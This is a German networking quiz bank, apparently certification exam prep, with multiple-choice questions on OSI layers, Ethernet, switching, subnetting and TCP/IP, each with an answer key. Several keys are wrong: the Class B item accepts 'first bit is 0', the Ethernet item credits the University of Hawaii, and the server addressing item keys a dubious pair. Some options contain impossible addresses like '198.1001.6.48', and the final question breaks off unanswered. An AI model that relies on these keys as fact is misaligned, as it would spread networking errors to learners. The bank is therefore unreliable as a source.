Information Knowledge Database

Fragenkatalog Netzwerktechnik

Welche Schicht des OSI-Modells bezieht sich auf physische Medien?
A. Schicht 1
B. schicht 2
C. Schicht 3
D. Schicht 4
E. Schicht 5
F. Schicht 6
ANSWER: A

Welche der folgenden Firmen haben die ersten Ethernet-LAN-Spezifikationen erstellt und implementiert? (Wählen Sie drei Antworten.)
A. Intel
B. Cisco
C. Digital
D. Xerox
E. Microsoft
F. Hewlett Packard
ANSWER: A, C, D

Welcher Steckverbindertyp unterstützt 100BASE-T Ethernet über UTP-Kabel der Kategorie 5e?
A. BNC
B. RJ-45
C. S/T-MIC
D. RJ-46
ANSWER: B

In welchen Situationen sollte ein nicht gekreuztes Kabel verwendet werden?
A. Router zu Router
B. Router zu PC
C. Router zu Switch
D. PC zu Hub
E. Switch zu Hub
F. Switch zu PC
ANSWER: C, D, F

Was sind die Gründe für die Vier-Repeater-Regel bei 10-Mbit/s-Ethernet? (Wählen Sie zwei Antworten.)
A. Verringern der Gesamtdämpfung
B. Verhindern von Mikrosegmentierung
C. Verhindern nacheilender Kollisionen
D. Verhindern einer Bitverschiebung
E. Begrenzen der Latenzzeit
ANSWER: C, E

Welche Vorteile haben drahtlose Netzte im Vergleich zu verkabelten Netzten? (Wählen Sie zwei Antworten.)
A. Höhere Übertragungsgeschwindigkeit
B. Höhere Sicherheit
C. Mobilität
D. Billigere Netzkarten
E. Keine Kabelverbindungen zu Hosts erforderlich
F. Keine Kartentreiber erforderlich
ANSWER: C, E

Wobei handelt es sich um Hub-Typen? (Wählen Sie drei Antworten.)
A. LAN
B. core (Zentral)
C. active (aktiv)
D. passive (passiv)
E. intelligent
F. convergent (konvergierend)
ANSWER: C, D, E

Wie lauten andere Bezeichnungen für einen Hub? (wählen Sie zwei Antworten.)
A. Konzentrator
B. Transceiver
C. Switch
D. Bridge
E. Multiport-Repeater
F. Aktiver Host
ANSWER: A, E

Welche Vorteile haben Peer-to-Peer-Netzte? (Wählen Sie drei Antworten.)
A. Die Sicherheit wird an einem zentralen Punkt verwaltet.
B. Sie lassen sich einfach erstellen.
C. Sie bieten eine hohe Skalierbarkeit.
D. Es ist kein Zentralgerät erforderlich.
E. Es wird kein zentraler Administrator benötigt.
F. Sie ermöglichen eine Zentralisierte Kontrolle der Investitionsgüter.
ANSWER: B, D, E

Welche Vorteile haben Client/Server-Netzte? (Wählen Sie drei Antworten.)
A. Die Sicherheit wird an einem zentralen Punkt verwaltet.
B. Es gibt einen einzelnen neuralgischen Punkt.
C. Zentralisierte Sicherungen.
D. Niedrige Betriebskosten
E. Erweiterte Netzdienste
F. Benutzer können ihre eigenen Ressourcen kontrollieren.
ANSWER: A, C, E

Wie viele Arbeitsstationen sollten in einem Peer-to-Peer-Netz maximal konfiguriert werden?
A. 25
B. 15
C. 10
D. 5
5. 2
ANSWER: C

Was geschieht in einem Ethernet-Netzwerk nach einer Kollision? (Drei richtige Antworten.)
A. Ein Backoff-Algorithmus wird aufgerufen, und die Übertragung wird gestoppt.
B. Den an der Kollision beteiligten Geräten steht ein Zeitraum zufälliger Länge für die prioritätsgesteuerte Übertragung des beschädigten Pakets zur Verfügung.
C. Die an der Kollision beteiligten Geräte senden einen Token, das die Zeit angibt, zu der die einzelnen Stationen die erneute Übertragung starten können.
D. die an der Kollision beteiligten Geräte haben keine Priorität für die Datenübertragung
E. Die Geräte, die Daten zu übertragen haben. hören zuerst den Übertragungskanal ab, bevor sie ihre Daten übertragen
F. Die Übertragung wird mit der Neuausgabe aller Daten neu gestartet.
ANSWER: A,D,E

Welche der folgenden Funktionen erfüllt CSMA/CD?( Wählen Sie drei Antworten.)
A. Übertragen und Epfangen von Datenpaketen
B. Freigabe eines tokens, wenn das Netz frei ist
C. Ermitteln von Fehlern in Datenpaketen oder im Netz
D. Übergabe eines Tokens an alle Stationen im Netz
E. Dekodieren von Datenpaketen und deren Überprüfung auf gültige Adressen, bevor die Daten an die höheren Schichten
des OSI-Referenzmodells weitergegeben werden
ANSWER: A,C,E

Was ist im Adressfeld eines Frames enthalten? (Zwei richtige Antworten.)
A. Absender-IP-Adresse
B. Ziel-IP-Adresse
C. Zielsubnetzmaske
D. Absender-MAC-Adresse
E. Ziel-MAC-Adresse
ANSWEr: D,E

Welche der nachfolgenden Optionen sind Feldnamen eines generischen Frames? (Wählen Sie drei Antworten.)
A. IP-Header
B. Spannungsbezug
C. Daten
D. Beschreibung
E. Länge
F. Rahmenprüfsumme
ANSWER: D,E,F

Ethernet-Standardspezifikationen reduzieren Unterbrechungen von Netzdiensten. Welche der folgenden Parameter werden
durch diese Standards festgelegt? (Wählen Sie drei Antworten.)
A. Minimale Segmentlänge
B. Maximale Segmentlänge
C. Minimale Anzahl von Stationen pro Segment
D. Maximale Anzahl von Stationen pro Segment
E. Minimale Anzahl von Repeatern zwischen Segmenten
F. Maximale Anzahl von Repeatern zwischen Segmenten
ANSWER: B,D,F

Welche Leistungsmerkmale tragen zu der weiten Verbreitung von Ethernet bei? (Wählen Sie drei Antworten.)
A. Einfache Wartung
B. Kollisionsfreie Technologie
C. Skalierbarkeit
D. Niedrige Installationskosten
E. Kompatibilität mit dem 802.5-Standard
F. Strategien zur Kollisionsvermeidung
ANSWER: A,C,D
Welches sind die beiden Hauptfunktionen eines Switches? (Wählen Sie zwei Antworten.)
A. Switching von Daten-Frames
B. Kostengünstiger Betrieb
C. Switching von Datenverkehr auf Schicht 3
D. Erstellung und Verwaltung von Tabellen
E. Isolieren von Paketen im LAN
ANSWER: A, D

Womit muss ein DB-15-AUI-Port verbunden sein, an den ein RJ-45-Kabel angeschlossen werden soll?
A. Hub
B. Joystick
C. Transceiver
D. Router
E. WIC
F. Netzkarte
ANSWER: C

Welcher Schicht des OSI-Modells wird eine Netzkarte zugeordnet?
A. Bitübertragungsschicht
B. Sicherungsschicht
C. Vermittlungsschicht
D. Transportschicht
ANSWER: B

Welches Protokoll wird normalerweise für den Datentransport über einen ISDN-B-Kanal verwendet?
A. PPP
B. SLIP
C. PAP
D. Frame Relay
ANSWER: A

Aus wie vielen Basiskanälen besteht eine ISDN-BRI-Verbindung?
A. 1
B. 2
C. 3
D. 4
ANSWER: B

Welcher Port auf einem Router wird zusammen mit einem Modem für Konfigurationsänderungen verwendet?
A. Konsole
B. Aux
C. BRI
D. Ethernet
ANSWER: B

Mit welchem Netzkabel werden ein Terminal und ein Konsolen-Port verbunden?
A. Gekreuztes Kabel
B. Nicht gekreuztes Kabel
C. Rollover-Kabel
D. Patch-Kabel
Answer: C

Welche Geräte stellen ein Taktsignal für die serielle Übertragung in einem WAN bereit? (Wählen Sie zwei Antworten.)
A. Switch
B. DCE
C. Server
D. DTE
E. CSU/DSU
ANSWER: B, E

Welche Adresse verwendet eine Bridge, um Entscheidungen bezüglich Filterung und Weiterleitung zu treffen?
A. Absender-MAC-Adresse
B. Absender-IP-Adresse
C. Ziel-MAC-Adresse
D. Ziel-IP-Adresse
E. Netz-IP-Adresse
ANSWER: C

Welche der folgenden Technologien kommen bei der drahtlosen Datenübertragung zum Einsatz? (Wählen Sie zwei Antworten.)
A. Kategorie 5
B. IR
C. TIA/EIA
D. HF
E. IEEE
ANSWER: B, D

Welche Pin-Paare sind in einem gekreuzten UTP-Kabel gekreuzt? (Wäheln Sie zwei Antworten.)
A. 1 und 2
B. 3 und 5
C. 7 und 8
D. 3 und 6
E. 5 und 7
F. 1 und 3
ANSWER: A, D

Welche Schicht des OSI-Referenzmodells ist für Kabel- und Steckverbindertypen zuständig?
A. Anwendungsschicht
B. Darstellungsschicht
C. Transportschicht
D. Vermittlungsschicht
E. Sicherungsschicht
F. Bitübertragungsschicht
ANSWER: F

Welche LAN-Technologie ist am weitesten verbreitet?
A. FDDI
B. Koaxial
C. Ethernet
D. Token Ring
ANSWER: C

Wie lautetn die richtigen Standards und Pinbelegungen für das grün/weiße und grüne Adernpaar bei einem gekreuzten Kabel? (Wählen Sie zwei Antworten.)
A. 568A = 1 und 2
B. 568A = 3 und 6
C. 568A = 4 und 5
D. 568B = 1 und 2
E. 568B = 3 und 6
F. 568B = 4 und 5
ANSWER: A, E

Was bedeutet das Wort “Base” in 10Base2?
A. Der verwendete Zahlenstandard.
B. Die Basisband-Signaldarstellung wird verwendet
C. Es wird nur ein Teilbereich des Übertragungsmediums verwendet.
D. Die Breitband-Signaldarstellung wird verwendet.
ANSWER: B

Woher stammt die MAC-Adresse?
A. Sie ist in der DHCP-Serverdatenbank enthalten.
B. Sie wird vom Netzwerkadministrator konfiguriert.
C. Sie ist in das ROM der Netzkarte eingebrannt.
D. Sie ist Bestandteil der Netzkonfiguration auf dem Computer
E. Sie wird bei der Erstellugn des Prozessor-Chips festgelegt.
ANSWER: C

Wie lang ist eine MAC-Adresse?
A. 8 Bit
B. 8 Byte
C. 24 Bit
D. 24 Byte
E. 48 Bit
F. 48 Byte
ANSWER: E

Welche Aussagen treffen auf Ethernet zu? (Wählen Sie drei Antworten.)
A. Ethernet erfüllt die Anforderungen von Schicht 2 und 3 des OSI-Modells.
B. Ethernet war ursprügnlich ein Xerox-eigener Standard.
C. Ethernet entspricht im Prinzip den 802.3-Standrads.
D. Die Bandbreite kann ohne Änderung der zugrunde liegenden Technologie erhöht werden.
E. Ethernet entspricht im Prinzip den 802.2-Standards.
F. Ethernet wurde ursprünglich an der University of Hawaii entwickelt.
ANSWER: C,D,F

Wie wird eine MAC-Adresse dargestellt?
A. Vier Gruppen von acht binären Zahlen, jeweils getrennt durch einen Punkt
B. vier Zahlen des Dezimalsystem, jeweils getrennt durch einen Punkt
C. Sechs Hexadezimalziffern
D. Zwälf Hexadezimalziffern
E. 24 Zahlen des Dezimalsystems
ANSWER: D

Welche Merkmale treggen auf das Konzept des Carrier Sense Multiple Access with Collision Detection (Vielfachzugriff
mit Aktivitätserkennung und Kollisionserkennung, CSMA/CD) zu? (Wählen Sie zwei Antworten.)
A. Kollisiosnfreie Umgebung
B. Nicht deterministisch
C. Deterministisch
D. Es gilt das Prinzip “Wer zuerst kommt, mahlt zuerst”.
E. Für die Datenübertragung werden Tokens verwendet.
ANSWER: B,D

Wie lautet der Name der PDU (Protocol Data Unit, Protokolldateneinheit) von Schicht 2?
A. Paket
B. Frame
C. Bit
D. Daten
C. Segment
ANSWER: B

Welches Gerät hat Vorrang bei der Datenübertragung, wenn nach einer Ethernet-Kollision der Backoff-Algorithmus aufgerufen wird?
A. Das Gerät mit der niedriegsten MAC-Adresse, das an der Kollision beteiligt war.
B. Das Gerät mit der niedriegsten IP-Adresse, das an der Kollision beteiligt war.
C. Das Gerät in der Kollisionsdomäne, dessen Backoff-Timer zuerst abgelaufen ist.
D. Die Geräte, die vor der Kollision zur gleichen Zeit mit der Datenübertragung begonnen haben.
ANSWER: C

Welche der folgenden Leistungsmerkmale sind einem Token Ring-Netz zuzuordnen? (Wählen Sie 2 Antworten.)
A. Kollisionsfreie Umgebung
B. Nicht deterministisch
C. Deterministisch
D. Verwendung von CSMA/CD
E. Kollisionsanfälligkeit
ANSWER: A, C

In welchen beiden Schichten des OSI-Models operiert Ethernet? (Wählen Sie 2 Antworten.)
A. Anwendungsschicht
B. Sitzungsschicht
C. Transportschicht
D. Vermittlungsschicht
E. Sicherungsschicht
F. Bitübertragungsschicht
ANSWER: E, F

Was sind gemäß IEEE-Standarts Teilschichten des Sicherungsschicht des OSI-Modells? (Wählen Sie 2 Antworten.)
A. Logical Link Control
B. Logical Layer Control
C. Media Access Control
D. Logical Link Communication
E. Media Access Communication
F. Physical Access Communication
ANSWER: A, C

Welche Ports eines Hubs leiten Datenverkehr weiter?
A. Nur der Port, an dem sich der Ziel-Host befindet.
B. Alle Ports in anderen Kollisionsdomänen.
C. Alle Ports mit Ausnahme des Absender-Ports.
D. Alle Ports des Hubs.
ANSWER: C

Welche der Folgenden Aussagen trifft auf den Ethernet-Vollduplexbetrieb zu? (Wählen Sie 2 Antworten.)
A. Vollduplex wird von gemeinsam genutzten Übertragungsmedien unterstützt.
B. Im Vollduplexmodus kann immer nur eine Station übertragen.
C. Beim Aushandeln der Verbindung wird dem Vollduplexmodus der Vorzug vor dem Halbduplexmodus gegeben.
D. Alle Ethernet-Implementierungen unterstützen den Halbduplex- und den Vollduplexbetrieb.
E. Der Vollduplexbetrieb kann sowohl durch automatisches Aushandeln als auch durch administrative Konfiguration initiert werden.
ANSWER: C, E,

Wie reagieren Ethernet-Stationen auf Kollisionen im Netz? (Wählen Sie 3 Antworten.)
A. Wenn die Kollision von allen Stationen erkannt wurde, wird ein Backoff-Algorithmus gestartet.
B. Nachdem die Kollision erkannt wurde, setzen alle Stationen die Übertragung noch für einen kurzen Zeitraum fort.
C. Alle an der Kollision beteiligten Stationen handeln einen Prioritätsstatus für die Übertragung aus, der nach dem Verzögerungszeitraum zur Anwendung kommt.
D. Wenn der Verzögerungszeitraum einer Arbeitsstation abgelaufen ist, versucht diese, wieder auf die Netzmedien zuzugreifen.
E. Der Verzögerungszeitraum ist bei allen Kollisionen gleich lang.
ANSWER: A, B, D

Wie werden in einem Ethernet-Netz Kollisionen erkannt?
A. Die Stationen kennzeichnen in den betreffenden Paketen das geänderte FCS-Feld.
B. Die Amplitude des Signals auf dem Netzmedium ist höher als normal.
C. Aufgrund einer Blockade wird kein Verkehr im Netz erkannt.
D. Die Amplitude des Signals auf dem Netzmedium ist niedriger als normal.
ANSWER: B

Welchen Zweck erfüllt die Präambel in einem Ethernet-Frame?
A. Sie dient als Zwischenspeicher für Daten.
B. Sie identifiziert die Absenderadresse.
C. Sie identifiziert die Zieladresse.
D. Sie kennzeichnet das Ender der Abstimmungsinformationen.
E. Sie besteht aus einer Wechselfolge aus Einsen und NUllen und dient zur zeitlichen Synchronisierung.
ANSWER: E

Was trifft auf Ethernet-MAC-Adressen zu? (Wählen Sie 3 Antworten.)
A. 24-Bit-OUI und 24-Bit-Seriennummer
B. 32-Bit-Netzadresse und 48-Bit-Host-Adresse
C. 6 Paare von Hexadezimalen
D. 48 Hexadezimalstellen
E. Logische Host-Adresse
F. Physikalische Adresse
ANSWER: A, C, F

Welcher IEEE-Standart definiert ein Token Ring-Netz?
A. 802.1
B. 802.3
C. 802.5
D. 802.11b
E. 802.11g
ANSWER: C

Was sind die Ursachen für die eingeschränkte Bandbreite von glasfaserbasierten Ethernet-Netzen? (Wählen Sie dire Antworten.)
A. Emitter-Technologie
B. Absolute Lichtleitfähigkeit des Glasfasermedium
C. Theoretische Grenzen des Glasfasermediums
D. Herstellungsverfahren für Glasfaserleiter
E. Detektor-Technologie
F. Knicke und Kurven in Glasfaserleitung
ANSWER: A, D, E

Wobei handelt es sich um Fast-Ethernet-Technologien? (Wählen Sie zwei Antworten.)
A. 100BASE-5
B. 100BASE2
C. 1000BASE-F
D. 100BASE-FX
E. 100BASE-TX
ANSWER: D, E

Welche Medientypen können beid er Implementierung eines 10BASE-T-Netzes verwendet werden? (Wählen Sie drei Antworten.)
A. UTP-Kabel der Kategorie 5
B. UTP-kabel der Kategorie 5e
C. UTP-Kabel der Kategorie 3
D. Koaxialkabel
E. Multimode-Glasfaserkabel
F. Einmodenfaser
ANSWER: A, B, C

Warum wird normalerweise verdrillten Paarkabeln der Vorzug vor Koaxialkabel gegeben? (Wählern Sie zwei Antworten.)
A. Günstigerer Preis
B. Einfache Installation
C. Herstellerspezifisch
D. Wird in den meisten älteren Netzen verwendet
E. Anfälliger für Verkabelungsfehler
F. Keine Beschränkung bezüglich der Segmentlänge
ANSWER: A, B

Welche Komponenten müssen bei der Installation eines typischen 10BASE-T-Netzes implementiert werden? 8Wählen Sie drei Antworten.)
A. Rj-11-Stecker
B. BNC-Stecker
C. RJ-48-Patch-Kabel
D. RJ-45-Stecker
E. UTP-Kabel der Kategorie 5
F. Hubs oder Switches
ANSWER: D, E, F

Welche der folgenden Ethernet-Technologien werden dem traditionellen Ethernet zugeordnet? (Wählen Sie drei ANtworten.)
A. 10BASE2
B. 10BASE5
C. 10BASE-T
D. 100BASE-T
E. 100BASE-FX
F. 100BASE-TX
ANSWER: A, B, C

Welche der folgenden Ethernet-Technologien verwenden dieselben Zeitparameter? (Wählen Sie drei Antworten.)
A. 10BASE2
B. 10BASE5
C. 10BASE-T
D. 100BASE-TX
E. 100BASE-FX
F. 100BASE-RX
ANSWER: A, B, C

Welches der folgenden Netzprobleme kann nicht mehr auftreten wenn in einem Ethernet-Netz seperate Adernpaare für das
Senden und Empfangen sowie eine gewünschte Topologie verwendet werden?
A. Kollisionen im physischen Bus
B. Längenbeschränkung für einzelne Segmente
C. Zu geringe Bandbreite einer Verkabelung der Kategorie 3
D. Replizierungsfehler bei Multiport-Bridges
E. Missachtung der CSCD/MA-Repeater-Regeln
ANSWER: A

Welche Repeater-Klasse ändert sich in unterschiedlichen Ethernet-Implementierungen?
A. Klasse I
B. Klasse II
C. Klasse III
D. Klasse IV
E. Klasse V
ANSWER: A

Als welche der folgenden Topologien betrachtet die Media Access Controll-Methode bei Gigabit-Ethernet eine Verbindung?
A. Ringtopologie
B. Gemeinsame Bustopologie
C. Punkt-zu-Punkt-Topologie
D. Sterntopologie
E. Erweiterte Sterntopologie
ANSWER: C

Bis zu welcher Entfernung wird die Datenübertragung über 10BASE-T nicht durch Signaldämpfung beeinträchtigt?
A. 100 Meter
B. 183 Meter
C. 300 Meter
D. 500 Meter
ANSWER: A

Was sind bei Gigabit-Ethernet die Bitmuster, die auf der Bitübertragungsschicht erstellt werden?
A. Impulse
B. Dreiecke
C. Frames
D. Symbole
E. Bilder
ANSWER: D

Welcher Aspekt muss beim Entwurf einer 10BASE-T-Architektur unbedingt beachtet werden?
A. Festlegung der richtigen Kabelkategorie im Entwurf
B. Minimierung der Switches im Entwurf
C. Maximierung der Hub-Nutzung
D. Minimierung der Verzögerung zwischen entfernten Stationen
ANSWER: D

Nach welcher Regel muss ein Techniker bei der Implementierung eines 10 Mbit/s-Ethernet-Netzes mit Hubs und Repeatern
vorgehn, damit keine Beschränkungen hinsichtlich der zeitlichen Abstimmung verletzt werden?
A. 4-5-3-Regel
B. 6-4-2-Regel
C. 3-4-5-Regel
D. 5-4-3-Regel
ANSWER: D

Mit welchen Übertragungsmodi arbeitet 100BASE-TX? (Wählen Sie zwei Antworten)
A. Umgekehrtes Simplex
B. Vollduplex
C. Halbduplex
D. Vollbiplex
E. Ein-Phasen-Biplex
ANSWER: B, C

Was haben alle Versionen von Gigabit-Ethernet gemeinsam? (Wählen Sie drei Antworten)
A. Paketgröße
B. Frame-Format
C. Medium
D. Zeitliche Steuerung
E. Übertragung
F. Wellenlänge
ANSWER: B, D, E

Wie nutzt 1000BASE-T die UTP-Adernpaare für die Datenübertragung?
A. Zwei Paare dienen zum Senden und zwei Paare zum Empfangen.
B. Ein Paar dient zum Senden, ein Paar zum Empfangen, ein Paar für das Taktsignal und ein Paar für die Fehlerkorrektur.
C. Alle vier Paare werden parallel von beiden Hosts für das gleichzeitige Senden und Empfangen genutzt.
D. 1000BASE-T verwendet wie 10BASE-T und 100BASE-TX zwei Adernpaare
ANSWER: C

Bei welchem Switching-Modus wird ein Frame übertragen, sobald die Ziel-MAC-Adresse gelesen wurde?
A. Fragment-free
B. Cut-through
C. Store-and-Forward
D. Latenzzeit-Weiterleitung
ANSWER: B

Was sendet ein Switch per Broadcast, um andere Switches im LAN von seiner Existenz in Kenntnis zu setzen?
A. STP
B. STA
C. BDPU
D. BPU
E. BPDU
ANSWER: E

In welchem der folgenden Netztypen können die Installationsstrecken mithilfe von Netzkopplungselementen verlängert werden?
A. Netze mit identischer Länge und gemeinsamen Medien
B. Netze mit erweiterten gemeinsamen Medien
C. Netze mit Punkt-zu-Punkt-Topologie
D. Netze mit erweiterter Punkt-zu-Punkt-Topologie
E. Netze mit Mehrfachzugriff-/Punkt-zu-Punkt-Topologie
ANSWER: B

Welcher Begriff wird verwendet, wenn Hubs durch Switches ersetzt werden, um die Zahl der Kollisionsdomänen zu erhöhen?
A. Kapselung
B. Latenzzeit
C. Segmentierung
D. Geschichtetes Modell
E. Broadcast-Domäne
F. Erweitertes Modell
ANSWER: C

Während der Arbeit am Computer stellt Mary fest, dass die Übertragung über das Netz länger dauert als üblich. Bei der Untersuchung
des Problems stellt sie fest, dass ihr Kollege John eine Online-Videokonferenz gestartet hat. Was ist mit hoher Wahrscheinlichkeit im
Netz aufgetreten?
A. Kollisionssturm
B. Broadcast-Sturm
C. IP-Sturm
D. Datenregen-Sturm
ANSWER: B

Welche der folgenden Adressen verwendet ein Router, um Weiterleitungsentscheidungen zu treffen?
A. Ziel-IP-Adresse
B. MAC-Adresse
C. Absender-IP-Adresse
D. Kapselungsadresse
E. Standard-Gateway
ANSWER: A

Wobei handelt es sich um ein Link-Stat-Protokoll? (Wählen Sie zwei Antworten.)
A. RIP
B. RIPv2
C. IGRP
D. OSPF
E. IS-IS
F. EIGRP
ANSWER: D, E

Wie vile nutzbare Subnetze der Klassse C werden mit der Subnetzmaske 255.255.255.224 erzeugt?
A. 1
B. 2
C. 3
D. 4
E. 5
F. 6
ANSWER: F

Unternehmen XYZ verwendet die Netzadresse 192.168.4.0. Zur Erstellung von Subnetzen wird die Maske
255.255.255.224 benutzt. Wie viele nutzbare Hosts kann jedes Subnetz enthalten?
A. 6
B. 14
C. 30
D. 62
ANSWER: C

Wie lautet bei der IP-Host Adresse 198.101.6.55/28 die Netz- und Broadcast-Adresse? (Wählen Sie zwei Antworten)
A. 198.1001.6.0
B. 198.1001.6.32
C. 198.1001.6.48
D. 198.1001.6.57
E. 198.1001.6.63
F. 198.1001.6.255
ANSWER: C, E

Ein Netzwerkadministrator muss ein auf mehrere Stockwerke verteiltes LAN überwachen und warten. Aufgrund sorgfältiger Überwachung hat der Administrator festgestellt, dass das Netzwerk durch starken Broadcast-Datenverkehr verlangsamt wird. Mit welchem Gerät lässt sich dieses Problem am besten lösen?
A. Bridge
B. Hub
C. Router
D. Transceiver
ANSWER: C

Welchen Nachteil hat das Cut-trough-Switching?
A. Keine Fehlerüberprüfung
B. Schwächere Fehlerüberprüfung
C. Kleinere Anzahl von kollisionsdomänen
D. Abnahme der Bandbreite
E. Höhere Latenzzeit
ANSWER: A

Wie kann man verhindert werden, dass in einem LAN zu viele Kollisionen auftreten? (Wählen Sie zwei Antworten)
A. Verkleinern der Größe von Kollisionsdomänen
B. Entfernen von Broadcast Domänen
C. Hinzufügen weiterer Hubs
D. Hinzufügen zusätzlicher verwalteter Switches
E. Hinzufügen von Transceivern
F: Verlängern der UTP-Kabel
ANSWER: A, D

Welches der folgenden Protokolle wird eingesetzt, um Schleifen zu verhindern?
A. STP
B. BDPU
C. UDP
D. EIGRP
E. Lernend
ANSWER: A

Wobei handelt es sich um Geräte der Schicht 1? (Wählen Sie zwei Antworten)
A. Router
B. Switch
C. Repeater
D. Bridge
E. Hub
ANSWER: C, E

Welche Obergrenzen dürfen beim Implementieren der 5-4-3-2-1-Regel nicht überschritten werden? (Wählen Sie drei Antworten)
A. Fünf Broadcast-Domänen
B. Vier Hubs
C. Drei Router
D. Drei Hostsegmente
E. Eine Kollisionsdomäne
ANSWER: B, D, E

Welche der folgenden Aussagen trifft auf das Konzept des Vollduplexmodus zu?
A. Der Datenverkehr erfolgt immer nur in eine Richtung, und es können keine Kollisionen auftreten.
B. Das Herunterladen von Daten erfolgt schneller als das Heraufladen.
C. Der Datenverkehr erfolgt in beide Richtungen, und es treten keine Kollisionen auf.
D. Das Heraufladen von Daten erfolgt schneller als das Herunterladen.
ANSWER: C

Bei welchem Switching-Modus ist die Latenzzeit am niedrigsten und findet keine Fehlerüberprüfung statt?
A. Cut-Through
B. Fragment-free
C. Store-and-Forward
D. Synchron
ANSWER: A

Wie wirkt sich eine Bridge in einem Netz aus? (Wählen Sie zwei Antworten)
A. Die Zahl der Kollisionsdomänen verringert sich.
B. Die Zahl der Kollisionsdomänen erhöt sich.
C. Die Zahl der Broadcast-Domänen verhöt sich.
D. Sie hat keine Auswirkung auf die Broadcast Domain
E. Die Länge des gemeinsam genutzten Übertragungsmediums verringert sich.
ANSWER: B, D

Welche Faktoren erhöhen sich in einem geswitchten Netz die Latenzzeit? (Wählen Sie zwei Antworten)
A. Verbindungsspezifische Verzögerung
B. Softwarespezifische Verzögerung
C. Falsche MAC-Adressen
D. Zu viele Kollisionsdomänen
ANSWER: A, B

Welche LAN-Geräte treffen Entscheidungen zur Frame-Weiterleitung anhand von MAC-Adressen?
A. Hub
B. Router
C. Bridge
D. Switch
E. Transceiver
ANSWER: C, D

Was erstellt ein Switch beim Lesen von MAC-Adressen, die ihn passieren?
A. Routing-Topologietabelle
B. CAM-Tabelle
C. Store-and-Forward-Liste
D. Cut-Trough-Domäne
E. MAC-Routenadresstabelle
ANSWER: B

Was passiert, wenn eine Bridge einen Frame empfängt, dessen MAC-Adresse nicht in der Tabelle gespeichert ist?
A. Der Frame wird verworfen.
B. Der Frame wird ignoriert.
C. Der Frame wird an den entsprechenden Port gesendet.
D. Der Frame wird an alle Ports mit Ausnahme des Absender-Ports gesendet.
ANSWER: D

Welche Schritte müssen ausgeführt werden, damit eine Kommunikation zwischen Geräten in verschiedenen Segmenten des physischen Netzwerks möglich ist? (Zwei richtige Antworten.)
A. Ermitteln der IP-Adresse des Absendergeräts
B. Beziehen der MAC-Adresse des Zwischengeräts
C. Übertragen der Datenpakete aus einem Netzsegment in ein anderes, um den Ziel-Host zu erreichen
D. Beziehen der IP-Adresse des lokalen Hosts
ANSWER: B, C

Worauf muss ein Systemadministrator achten, wenn er einem Netzserver eine IP-Adresse zuweist? (Wählen Sie zwei Antworten.)
A. Adressen von Servern sollten dynamisch mittels DHCP zugeordnet werden.
B. Server mit dynamisch zugewiesenen IP-Adressen lassen sich in einem Netz nur schwer lokalisieren.
C. Server, deren IP-Adressen sich regelmäßig ändern, haben kaum Einfluss auf die Netzleistung.
D. Die IP-Adressen von Servern sollten vom Netzadministrator statisch zugewiesen werden.
ANSWER: B, C

Es wurden verschiedene Lösungen entwickelt, um die Zahl der öffentlich nutzbaren IP-Adressen zu erhöhen. Welche Technologien zählen zu diesen Lösungen? (Wählen Sie drei Antworten.)
A. DHCP
B. Klassenloses Interdomänen-Routing
C. Neues 64-Bit-Adressierungsschema
D. Netzadress-Übersetzung
E. IPv6
F. IPv5
ANSWER: B, D, E

Welche Kriterien kennzeichnen eine Adresse der Klasse B? (Zwei richtige Antworten.)
A. Dezimalzahl im ersten Oktett zwischen 127 bis 191
B. Dezimalzahl im ersten Oktett zwischen 127 bis 192
C. Dezimalzahl im ersten Oktett zwischen 128 bis 191
D. Erstes Bit der binären IP-Adresse ist 0.
E. Die ersten beiden Bits der binären IP-Adresse haben den Wert 10.
F. Die ersten drei Bits der binären IP-Adresse haben den Wert 110.
ANSWER: C, D

Welche Operationen führt IP durch? (Wählen Sie drei Antworten.)
A. Weiterleitung von Paketen an entfernte Hosts
B. Bereitstellung eines physischen Adressierungsschemas
C. Definieren von Frames
D. Definieren von Paketen
E. Datenübertragung zwischen der Internet- und der Netzzugangsschicht
F. Datenübertragung zwischen der Internet- und der Anwendungsschicht
ANSWER: A, D, E

Welche Protokolle operieren auf der Transportschicht des TCP/IP-Modells? (Wählen Sie zwei Antworten.)
A. TCP
B. IP
C. UDP
D. FTP
E. NDS
F. IPX
ANSWER: A, C

Welche Dienste stellt TCP bereit? (Drei richtige Antworten.)
A. Adressauflösung
B. Kommunikation zwischen Endsystemen
C. Flusskontrolle
D. Zuverlässigkeit der Datenübertragung
E. Pfadbestimmung
F. Datendarstellung
ANSWER: B, C, D

Welche OSI-Schichten entsprechen der Netzzugangsschicht des TCP/IP-Modells? (Wählen Sie zwei Antworten.)
A. Transportschicht
B. Bitübertragungsschicht
C. Sitzungsschicht
D. Vermittlungsschicht
E. Sicherungsschicht
F. Anwendungsschicht
ANSWER: B, E

Welches Modell verwendet ein Netztechniker zur Verdeutlichung des Datenkommunikationsprozesses?
A. OSI-Modell
B. IEEE-Modell
C. ANSI-Modell
D. Internetworking-Modell
ANSWER: A

Welche Schicht des TCP/IP-Modells unterstützt sowohl LAN- als auch WAN-Technologien?
A. Netzzugangsschicht
B. Internet-Schicht
C. Transportschicht
D. Anwendungsschicht
ANSWER: A

Welche Schicht bildet im TCP/IP-Modell die Host-zu-Netz-Schicht?
A. Anwendungsschicht
B. Darstellungsschicht
C. Transportschicht
D. Netzzugangsschicht
E. Sicherungsschicht
F. Internet-Schicht
ANSWER: D

Welche der folgenden Funktionen ist ICMP zuzuordnen?
A. Stellt Steuerungs- und Messaging-Funktionen bereit.
B. Stellt Dienste für die Adressauflösung bereit.
C. Unterstützt E-Mail-Funktionen.
D. Ermöglicht die Dateiübertragung zwischen Hosts.
E. Ermöglicht das Remote Login bei entfernten Hosts.
ANSWER: A

Welche TCP/IP-Schicht verfügt über Dienste, die eine logische Verbindung zwischen dem sendenden und dem
empfangenden Host unterstützen?
A. Anwendungsschicht (Application Layer)
B. Vermittlungsschicht (Network Layer)
C. Internetschicht (Internet Layer)
D. Transportschicht (Transport Layer)
E. Darstellungsschicht (Presentation Layer)
F. Sitzungsschicht (Session Layer)
ANSWER: D

In welchen Bereichen des in der Abbildung gezeigten Netzes sollten private Adressen verwendet werden?
A. Nur in Bereich a
B. Nur in Bereich b
C. Nur in Bereich c
D. In den Bereichen a und b
E. In den Bereichen a und c
F. In den Bereichen a, b und c
ANSWER: E

In welcher Hinsicht sind das TCP/IP- und das OSI-Modell identisch? (Wählen Sie drei Antworten.)
A. Beide Modelle verwenden eine Anwendungsschicht.
B. In beiden Modellen ist eine Bitübertragungsschicht vorhanden.
C. Beide Modelle basieren auf leitungsvermittelten Netzen.
D. In beiden Modellen existiert eine Netzzugangs- und eine Sicherungsschicht.
